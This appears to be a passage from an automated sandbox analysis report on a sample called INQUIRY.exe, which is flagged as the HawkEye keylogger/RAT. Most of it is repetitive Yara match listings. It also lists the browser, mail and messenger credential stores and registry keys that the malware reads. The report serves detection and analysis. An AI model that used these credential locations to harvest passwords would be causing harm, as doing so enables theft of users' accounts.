                    Source: Yara matchFile source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863232173.0000000002DE0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 6776, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Yara detected MailPassViewShow sources
                    Source: Yara matchFile source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.929210977.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863445427.0000000003961000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.888584585.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.829490755.0000000003E11000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5684, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY
                    Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 36.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 36.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Tries to harvest and steal browser information (history, passwords, etc)Show sources
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Tries to steal Instant Messenger accounts or passwordsShow sources
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Tries to steal Mail credentials (via file access)Show sources
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Tries to steal Mail credentials (via file registry)Show sources
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword
                    Yara detected WebBrowserPassView password recovery toolShow sources
                    Source: Yara matchFile source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.894159498.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.929210977.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863445427.0000000003961000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.829490755.0000000003E11000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6700, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 4184, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY
                    Source: Yara matchFile source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE

                    Remote Access Functionality:

                    barindex
                    Detected HawkEye RatShow sources
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
